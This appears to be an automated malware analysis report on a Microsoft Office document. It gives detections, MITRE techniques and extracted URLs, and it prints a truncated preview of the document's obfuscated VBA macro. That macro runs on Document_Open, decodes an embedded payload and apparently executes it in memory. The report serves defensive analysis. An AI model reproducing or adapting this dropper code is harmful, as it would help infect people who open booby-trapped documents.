MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6409921-0' further supports its malicious nature. The embedded URL is suspicious and likely serves as the initial point of contact for the payload.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6409921-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6409921-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7989 bytes |
SHA-256: f5795943ed624beac2a75cb0cd6ffd01cf5caa3a7bdda1ec08975701c89d59af |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim europeanization As Variant Dim faenum As Variant achromatous alarmingly = 25 + 15 Pmt 0, alarmingly, 5329, 47642, 8 End Sub Sub achromatous() unwelcome.rapt.Value = Day(#12/5/2013#) Set aorist = unwelcome.rapt.SelectedItem neoplasia = 43 + 7 Pmt 0, neoplasia, 24744, 31974, 5 mountains = aorist.Name meteorologist = 92 - 58 + 7810 locofoco = Right(mountains, meteorologist) victimize = enceliopsis(locofoco) intolerable = 20 + 18 Pmt 0, intolerable, 32628, 11229, 5 #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim biliary As LongPtr Dim atole As LongPtr Dim quicksands As LongPtr Dim novice As LongPtr Authorsr = 69 - 25 + 2020 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim atole As Long Dim biliary As Long Dim quicksands As Long toimeme = 11 - 17 + 787 Dim novice As Long Authorsr = toimeme + 3459 #End If psychology = 60 + 33 Pmt 0, psychology, 31062, 23258, 6 shikar = 51 + 15 Pmt 0, shikar, 19616, 32862, 2 cestum = victimize biliary = mildran.eyelid(cestum) Dim existentialist As Byte Dim rooted As Long quicksands = 36 - 18 - 18 atole = biliary + Authorsr novice = 3 - 10 + 201534 alea = clarinetist(novice, _ quicksands, _ atole, quicksands, _ quicksands, quicksands, quicksands) inequitably = 20 + 20 Pmt 0, inequitably, 32517, 23183, 5 End Sub Function enceliopsis(unmodulated) As String Dim ratione As Long montevideo = Math.Round(284) homogeneously = "flanking" Dim metabolite(63) As Long Dim commutative As Long Dim corrival(63) As Long Dim disprove(63) As Long Dim nauseate As Long Dim hoarder() As Byte Dim farkleberry As Long Dim e(6962) As Byte advisee = 45 - 121 + 332 mb = 122 - 97 + 230 eagle = 124 - 25 - 35 Dim cowper As Integer department = 27 - 94 + 65347 gravel = 76 - 2 + 262070 chattel = 100 - 5 + 16711585 ivory = 126 - 90 + 65500 detractory = 37 - 97 + 4156 Dim montanan As String materialize = 96 - 41 - 55 cancellated = 12 - 99 + 7930 Dim oscine() As Byte Dim beamends As String Dim malva As Integer oscine = VBA.StrConv(unmodulated, 128) Dim unambitious As Long tanglebush = 37 + 21 Pmt 0, tanglebush, 4973, 55252, 5 lightfooted = 7840 + 3 CloseUp = vbKeyShift - 12 For hormone = (3 - 3) To lightfooted If hormone Mod 2 = (4 - 4) Then oscine(hormone) = oscine(hormone) - CloseUp Else oscine(hormone) = oscine(hormone) - (CloseUp - 1) End If Next hormone surface = 30 + 3 Pmt 0, surface, 9375, 44249, 7 kappa = zambia For nauseate = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) disprove(nauseate) = atopognosia(nauseate, eagle, 66) corrival(nauseate) = atopognosia(nauseate, detractory, 66) metabolite(nauseate) = atopognosia(nauseate, gravel, 66) Next nauseate grievously = 49 + 50 Pmt 0, grievously, 18764, 37821, 8 hoarder = oscine apollyon = 19 + 36 Pmt 0, apollyon, 26387, 26777, 5 hardearned = 24 - 110 + 89 adenoidal = Fix(416) montevideo = Rnd(198) multiply = hardearned + 1 hourglass = 6 - 61 + 57 For commutative = (5 - 5) To lightfooted galop = hoarder(commutative) compositor = hoarder(commutative + 2) pharmacological = corrival(kappa(hoarder(commutative + 1))) issus = disprove(kappa(compositor)) + kappa(hoarder(commutative + hardearned)) ratione = metabolite(kappa(galop)) + pharmacological + issus nauseate = atopognosia(ratione, chattel, 58) e(farkleberry) = atopognosia(nauseate, ivory, 48) nauseate = atopognosia(ratione, department, 58) e(farkleberry + 1) = atopognosia(nauseate, advisee, 48) e(farkleberry + hourglass) = atopognosia(ratione, mb, 58) farkleberry = farkleberry + hourglass + 1 commutative = commutative + 3 Next enceliopsis = e End Function Attribute VB_Name = "sideboard" ' Es ist kalt und regungslos #If (13 * 3 + 5) ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.